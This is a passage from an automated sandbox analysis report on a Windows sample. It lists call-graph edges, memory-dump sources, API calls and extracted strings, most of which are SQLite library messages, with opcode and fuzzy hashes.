107686->107688 107689 7ffeee18e6bc 107686->107689 107688->107681 107690 7ffeee18e6ee 107688->107690 107720 7ffeee1a8340 107689->107720 107690->107682 107692 7ffeee18e715 107690->107692 107729 7ffeee1bbae0 11 API calls 2 library calls 107690->107729 107730 7ffeee12be10 11 API calls 2 library calls 107692->107730 107697 7ffeee1f4995 107696->107697 107699 7ffeee1f49e5 107696->107699 107697->107699 107731 7ffeee1a0b50 107697->107731 107699->107653 107700->107659 107701->107654 107702->107649 107703->107654 107706 7ffeee21ed6d _raise_excf 107704->107706 107705 7ffeee239c70 _raise_excf 30 API calls 107705->107706 107706->107705 107707 7ffeee21edd0 _raise_excf 107706->107707 107708 7ffeee21ee01 _raise_excf 107706->107708 107707->107671 107708->107707 107709 7ffeee1b2470 _raise_excf RaiseException 107708->107709 107709->107707 107710->107676 107711->107670 107713 7ffeee10e178 107712->107713 107714 7ffeee1a5a50 11 API calls 107713->107714 107717 7ffeee1a57b3 107713->107717 107718 7ffeee10e194 107713->107718 107714->107717 107715 7ffeee1a5883 107716 7ffeee1a5470 11 API calls 107715->107716 107716->107718 107717->107715 107717->107718 107719 7ffeee1a5a10 11 API calls 107717->107719 107718->107683 107719->107715 107721 7ffeee1a836a 107720->107721 107723 7ffeee1a8377 107720->107723 107722 7ffeee21f510 _raise_excf 29 API calls 107721->107722 107722->107723 107724 7ffeee1a8387 107723->107724 107725 7ffeee1036f0 20 API calls 107723->107725 107724->107681 107725->107724 107726->107682 107727->107681 107728->107682 107729->107692 107730->107682 107732 7ffeee1a0b60 _raise_excf 107731->107732 107733 7ffeee1f1fc0 new[] 11 API calls 107732->107733 107735 7ffeee1a0c47 _raise_excf 107732->107735 107734 7ffeee1a0bc2 new[] 107733->107734 107734->107735 107738 7ffeee104510 21 API calls 107734->107738 107735->107699 107736 7ffeee1a0c41 _raise_excf 107736->107735 107737 7ffeee114c20 _raise_excf 11 API calls 107736->107737 107737->107735 107738->107736
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$:memory:$API call with %s database connection pointer$BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$invalid$main$misuse$temp$v
                                                                                                                                                                                      • API String ID: 0-534082081
                                                                                                                                                                                      • Opcode ID: 4ecbe897bc3acc97783ba582dca2a4c78f2ca07ca2fa220f425904c735e13a8f
                                                                                                                                                                                      • Instruction ID: e30c7a2e7ca9c309d90135d84894abf7dccc19defa1505d6d23db028285f2a35
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ecbe897bc3acc97783ba582dca2a4c78f2ca07ca2fa220f425904c735e13a8f
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1426A25A08B8295EB659F25B84037927A1FF88B88F475136D9CE073B5CFBDE485D302
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %!S$%s.%s$%s.%s.%s$'%s' is not a function$..%s$Expression tree is too large (maximum depth %d)$access to view "%s" prohibited$no such table: %s$no tables specified$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                      • API String ID: 0-3486433936
                                                                                                                                                                                      • Opcode ID: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                      • Instruction ID: 5487fc88afb93b6f0ea9b8577270df17e4e8e93740952c893369f62dcb4ec77d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e034a36cc12bd9215a9899eeb8c44c2f5c6ffbc58f4d44d84a9563eea4d82b8e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BD2B132A09B82C6EB658F15E1403B977A0FB44B94F074236DE9D477A5EFB8E495C302
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                      • API String ID: 823142352-3829269058
                                                                                                                                                                                      • Opcode ID: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                      • Instruction ID: 5d2f582f2dc2532f302acede1068b7e9b361ee3072a97e769aed917a920a5d04
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9648a8e1b34e6d54a88f7339791b418315a19169b265df44462c620f0c7b9da4
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1328121E09A4686FB558F15F48037963A0BF89BA4F175636D9DE036F4DFBCE8808702
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: :memory:
                                                                                                                                                                                      • API String ID: 0-2920599690
                                                                                                                                                                                      • Opcode ID: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                      • Instruction ID: d13d4d02403e704143c645e8ad51c27d4016f29c64d9e65db5f829047e2fea25
                                                                                                                                                                                      • Opcode Fuzzy Hash: bad3a322da7ddd70a11fef03fe72386b6c13d9ab35f0f024c8c279fdf6b098db
                                                                                                                                                                                      • Instruction Fuzzy Hash: 45329E62A0D78A82EB648F65B55037927A0FF89B44F174536CACD437B1EFBCE4918302
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoSystem
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                                                                      • Opcode ID: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                      • Instruction ID: aed5e13baa436f418123c13b3810fd1b5e5d1fb5b545ff8f48c35a6dea9faaba
                                                                                                                                                                                      • Opcode Fuzzy Hash: a4e6bad04b452fc8cc7e04760665395b3d9b48427dece9289ded6bff2a09062d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 39B1D424E0AB0781FE698F59B84133422A4BFCCB40F575935D9DD073B0EFEEA9918242
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                      • Instruction ID: a71bebd451b14cffb0f23f34052a1dbaef308ae6f8449531680bb7202fae6a22
                                                                                                                                                                                      • Opcode Fuzzy Hash: 317393ef1743365a49eef31e05f6b03ef5d1b5c47fd7b020569ada7a3cf6cb0d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AC14322A08A4285FB598F29F45037D2791FF85B84F174136D9CD477B5DEACE885C382

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$CreateMappingView
                                                                                                                                                                                      • String ID: winFileSize$winShmMap1$winShmMap2$winShmMap3
                                                                                                                                                                                      • API String ID: 3452162329-2257004166

Control-flow Graph

[Control-flow graph not reproduced. First block: 7ffeee103a80; API calls in the graph: SetFilePointer, SetEndOfFile. Legend: Executed / Not Executed.]
Similarity
• API ID: FilePointer
• String ID: winSeekFile$winTruncate1$winTruncate2
• API String ID: 973152223-2471937615

Control-flow Graph

[Control-flow graph not reproduced. First block: 7ffeee104d70; API calls in the graph: GetFileAttributesW, DeleteFileW. Legend: Executed / Not Executed.]
Similarity
• API ID: File$AttributesDelete
• String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
• API String ID: 2910425767-1405699761

Control-flow Graph

[Control-flow graph not reproduced. First block: 7ffeee1036f0; API calls in the graph: ReadFile. Legend: Executed / Not Executed.]
Similarity
• API ID: FileRead
• String ID: delayed %dms for lock/sharing conflict at line %d$winRead
• API String ID: 2738559852-1843600136

Control-flow Graph

[Control-flow graph not reproduced. First block: 7ffeee239c70; API calls in the graph: RaiseException. Legend: Executed / Not Executed.]

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      control_flow_graph 2101 7ffeee25996c-7ffeee25996f 2102 7ffeee259971-7ffeee25998a RtlFreeHeap 2101->2102 2103 7ffeee2599a7 2101->2103 2104 7ffeee2599a2-7ffeee2599a6 2102->2104 2105 7ffeee25998c-7ffeee2599a0 GetLastError call 7ffeee259df4 call 7ffeee259ec8 2102->2105 2104->2103 2105->2104
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FFEEE2622A2,?,?,?,00007FFEEE2622DF,?,?,00000000,00007FFEEE25FE4D,?,?,?,00007FFEEE25FD7F), ref: 00007FFEEE259982
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFEEE2622A2,?,?,?,00007FFEEE2622DF,?,?,00000000,00007FFEEE25FE4D,?,?,?,00007FFEEE25FD7F), ref: 00007FFEEE25998C
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                      • Opcode ID: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                      • Instruction ID: e1d5d5061107eb7bfe14cfed9548c26bffa59dc556f10375d9f0a086d3eb8b5b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DE08650F09A0383FF156FB2B9853781161AFDC700F0B4434C9ED42271EDAC64994213
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$FIRST$INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);$LAST$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$invalid rootpage$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$unsupported use of NULLS %s$views may not be indexed$virtual tables may not be indexed
                                                                                                                                                                                      • API String ID: 0-2483461966
                                                                                                                                                                                      • Opcode ID: a8a71a941c890f90e2ae85053de89cb1297b1c782d384ea9fdf8966f3a450f00
                                                                                                                                                                                      • Instruction ID: 13113b58b3adaee61ea4e236168e7eb231ed3930462edba1ef379f5f04ad3c90
                                                                                                                                                                                      • Opcode Fuzzy Hash: a8a71a941c890f90e2ae85053de89cb1297b1c782d384ea9fdf8966f3a450f00
                                                                                                                                                                                      • Instruction Fuzzy Hash: 63C2D432A09BA285EB188B15F4457B977A1FB84B94F474136DACD877A5DFBCE480C302
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s: "%s" - should this be a string literal in single-quotes?$%s: %s$%s: %s.%s$%s: %s.%s.%s$H$N$ROWID$ambiguous column name$coalesce$double-quoted string literal: "%w"$excluded$main$misuse of aliased aggregate %s$misuse of aliased window function %s$new$no such column$old$row value misused$z
                                                                                                                                                                                      • API String ID: 0-3187542301
                                                                                                                                                                                      • Opcode ID: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                      • Instruction ID: 5c9417d81218b5493e69c61409c7de2e0660cd787ad18a63bdd952df95bfa4d8
                                                                                                                                                                                      • Opcode Fuzzy Hash: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                      • Instruction Fuzzy Hash: 74C2C272A0C69286EB648B16A04037D7BA1FB85B80F574136DECE477A5DFBEE484C701
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                      • API String ID: 0-767664412
                                                                                                                                                                                      • Opcode ID: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                      • Instruction ID: 2d1f03e04a785ea342f58688a0c896eaae6e5f38eefd104c1d3ac33b4ba79aae
                                                                                                                                                                                      • Opcode Fuzzy Hash: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 35B149D37305984BD7588A3EF822BDD2B85D3A5344F49523AF685CFFC6E92AE5018702
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: , ?$,%s(?)$4$PRAGMA %Q.page_size$compress$content$error parsing prefix parameter: %s$languageid$matchinfo$missing %s parameter in fts4 constructor$no such column: %s$notindexed$order$prefix$simple$tokenize$uncompress$unrecognized parameter: %s
                                                                                                                                                                                      • API String ID: 0-404594414
                                                                                                                                                                                      • Opcode ID: f80f9d41d871cb6df72d7b536e3108c8bbb9dd35af6d5dd8f3c3b51340b2c416
                                                                                                                                                                                      • Instruction ID: 48ec63effb79c5e65ed76799559a0de0755f93a714de4cddfaefd558c4c8da6d
                                                                                                                                                                                      • Opcode Fuzzy Hash: f80f9d41d871cb6df72d7b536e3108c8bbb9dd35af6d5dd8f3c3b51340b2c416
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BD26A21A09B4685EB558F26F84037967A0FF89B94F170536DA9E037B4CFBDE4898702
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: .$:$:$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
• Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      • String ID: %s mode not allowed: %s$/$/$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                      • String ID: ascii$bm25$fts5$fts5_get_locale$fts5_locale$fts5_source_id$highlight$porter$snippet$trigram$unable to delete/modify user-function due to active statements$unicode61
                                                                                                                                                                                      • String ID: Child page depth differs$Extends off end of page$Fragmentation of %u bytes reported as %u on page %u$Multiple uses for byte %u of page %u$Offset %u out of range %u..%u$Rowid %lld out of order$Tree %u page %u cell %u: $Tree %u page %u right child: $Tree %u page %u: $btreeInitPage() returns error code %d$free space corruption$unable to get the page. error code=%d
                                                                                                                                                                                      • String ID: PRIMARY KEY$UNIQUE$UPDATE "%w".sqlite_master SET sql = sqlite_drop_column(%d, sql, %d) WHERE (type=='table' AND tbl_name=%Q COLLATE nocase)$after drop column$cannot %s %s "%s"$cannot drop %s column: "%s"$cannot drop column "%s": no other columns exist$drop column from$no such column: "%T"$q$view$virtual table
                                                                                                                                                                                      • String ID: %r %s BY term out of range - should be between 1 and %d$INTERSECT$LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$%s_segments$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$block$misuse
                                                                                                                                                                                      • String ID: %s a subset of columns on fts5 contentless-delete table: %s$%s contentless fts5 table: %s$'delete' may not be used with a contentless_delete=1 table$cannot DELETE from contentless fts5 table: %s$cannot UPDATE$delete$fts5_locale() requires locale=1$version
                                                                                                                                                                                      • API String ID: 0-2196455284
                                                                                                                                                                                      • Opcode ID: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                      • Instruction ID: 55ce20d7ee17949b4baac0d1cdc0f618da38d7ae577b960a3b5cffe3b4d09cc9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b6913b390b1c84940994affae7c9a8ac6093eb483c3c98b383ccebf530296ed
                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F1A761A0865386EB609A56B464B7A2790FB44B84F434033DF8D476B9EFBCE8D1C742
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                      • API String ID: 0-875588658
                                                                                                                                                                                      • Opcode ID: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                                                      • Instruction ID: d4173bab8f47e50490b540663f9863c221c1623d944fcbf236b99a398ddbbf20
                                                                                                                                                                                      • Opcode Fuzzy Hash: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                                                      • Instruction Fuzzy Hash: C5028262F0864689FB28CF65F4803BC37A1AB88748F074172DE8E566B5DEBCE545C342
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: @$BINARY$E$Expression tree is too large (maximum depth %d)$NOCASE$ON clause references tables to its right$false
                                                                                                                                                                                      • API String ID: 0-1048875598
                                                                                                                                                                                      • Opcode ID: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                      • Instruction ID: a1431418988068b16149bc3bccab189a9b87ecf68e4a4eb968430942b1e019d8
                                                                                                                                                                                      • Opcode Fuzzy Hash: c37775dcafb2c9ca56a1ff290019ec1c019d98b367699c81505ae858e2e54189
                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D2B262A0878186E7648F26E14077977A1FB48B84F07513BDE9D477A9DF7CE890C702
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                      • API String ID: 0-3346138532
                                                                                                                                                                                      • Opcode ID: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                      • Instruction ID: b470e967fd8d87c57c1af8e7fea031d8fa92e41590fdaf54e1d4a0adb27923b0
                                                                                                                                                                                      • Opcode Fuzzy Hash: bfa8ccc286add4e7574ec9bcdde002d14d4b37fe795130a8d25155253f5d1388
                                                                                                                                                                                      • Instruction Fuzzy Hash: D8824D72A0868186E7659F15F0407AAB7A1FB84B84F174036DBCE47B65DF7EE481CB02
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                      • API String ID: 0-3346138532
                                                                                                                                                                                      • Opcode ID: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                      • Instruction ID: 11469043e2e86274bd817d9e4fa6907d199e08671c4e8cf47594ff5b0d377926
                                                                                                                                                                                      • Opcode Fuzzy Hash: 31045656e8ee966943db61b51eeccfaadc4af08e63607a43928766a9e49b298b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 77725E72A0868186E7659F15F0407AEB7A1FB84B84F174036DBCE47A65DF7EE481CB02
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$GROUP$HAVING clause on a non-aggregate query$ORDER$aggregate functions are not allowed in the GROUP BY clause$too many terms in ORDER BY clause
                                                                                                                                                                                      • API String ID: 0-2302332886
                                                                                                                                                                                      • Opcode ID: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                      • Instruction ID: d4aab9984b629f4f9b38d882adcaede2a59170a0390472e4b8cf259e91546517
                                                                                                                                                                                      • Opcode Fuzzy Hash: bb623a9a2c18d20b81f837a5029010e69f6c694c5b79584c483b8187198777e4
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC327C72A08A428AEB14CF65E1803BD37A1FB44B88F474036DE8D677A5DF78E495C302
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$DELETE FROM '%q'.'%q_idx' WHERE (segid, (pgno/2)) = (?1, ?2)$REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)$block$misuse
                                                                                                                                                                                      • API String ID: 0-1819929800
                                                                                                                                                                                      • Opcode ID: 6957eb0a29fed5253a688e71034a2f6c56332714ccf9af88f8654fc03cd0c5d4
                                                                                                                                                                                      • Instruction ID: daafbbc2dcc5d0c62d3017d97f654cdad5e751f686abbb3c37b181f9f236d7e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6957eb0a29fed5253a688e71034a2f6c56332714ccf9af88f8654fc03cd0c5d4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF25B72A0964386EB549F25F4543B837A1FB48B84F074036DA8E477A6DFBDE885C342
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.1904149883.00007FFEEE101000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFEEE100000, based on PE: true
• Associated: 00000000.00000002.1904132000.00007FFEEE100000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904519199.00007FFEEE264000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904556452.00007FFEEE29D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904577581.00007FFEEE2A2000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904603328.00007FFEEE2A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1904627148.00007FFEEE2A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffeee100000_hJ1bl8p7dJ.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                      • API String ID: 0-741541785
                                                                                                                                                                                      • Opcode ID: 5d232b5b87d01dbe22b5cbe3e294ebfdbdc39e8ff610561b42d71e1cb040bb58
                                                                                                                                                                                      • Instruction ID: 7356f02e59cff94478f43f73aea9087308af2a175c5018e1d5bbe77ef842de9c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d232b5b87d01dbe22b5cbe3e294ebfdbdc39e8ff610561b42d71e1cb040bb58
                                                                                                                                                                                      • Instruction Fuzzy Hash: 65126E72A09742CAEB58CF25E4507BD37A1FB98744F13413ADA8D477A4EFB9E4818B01
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                      • Opcode ID: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                      • Instruction ID: ce9e14e1ab31c2dc275b92abff08531d2682faffb933472d580a69cff4570ea5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 234d24ab78c041c97127b44f915937d46382276f4bd99e440f8e29486e42e105
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C315032A18B8186EB60CF25F8403AE73A0FBC9758F560135EADD43B68EF78C5458B01
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: ?$?$BINARY$Expression tree is too large (maximum depth %d)$auto-index$automatic index on %s(%s)
                                                                                                                                                                                      • API String ID: 0-2778317500
                                                                                                                                                                                      • Opcode ID: 69ee29c1a85859ca265612b6d53f71265f5f21c0cc02f3bbb590bb56c0c2f6e5
                                                                                                                                                                                      • Instruction ID: 0125e1d19149f8b5942a68478d53bfe873b62254ec12e1aedea6c5552daf2741
                                                                                                                                                                                      • Opcode Fuzzy Hash: 69ee29c1a85859ca265612b6d53f71265f5f21c0cc02f3bbb590bb56c0c2f6e5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC29372A08B8186DB60DF15E480BAD77A5FB84B88F438136DB8E43765EF78D895C701
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                                                                                                                      • API String ID: 0-2646008018
                                                                                                                                                                                      • Opcode ID: 372c448508bd327ddcd881427b2f7c790634e4d86250a6e64fdab9af79e6c5bc
                                                                                                                                                                                      • Instruction ID: 949de8af774c744e198be09f730588511001f6454f2f8f8ee94c1ee3b9adea72
                                                                                                                                                                                      • Opcode Fuzzy Hash: 372c448508bd327ddcd881427b2f7c790634e4d86250a6e64fdab9af79e6c5bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EB28D22E09A4286FB549F65F5503B823A1BF48B85F074136CECE577A5DFBCE4858342
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                                                      • API String ID: 0-968123305
                                                                                                                                                                                      • Opcode ID: 5e866bf8eac03aac69fd030e9430e884704da55f6b6b6d57d379a419dbebb80b
                                                                                                                                                                                      • Instruction ID: ec124fb9c554e64b50cb74e07ddb396221d49e0b30e289b12bf0a4354b5ddbe7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e866bf8eac03aac69fd030e9430e884704da55f6b6b6d57d379a419dbebb80b
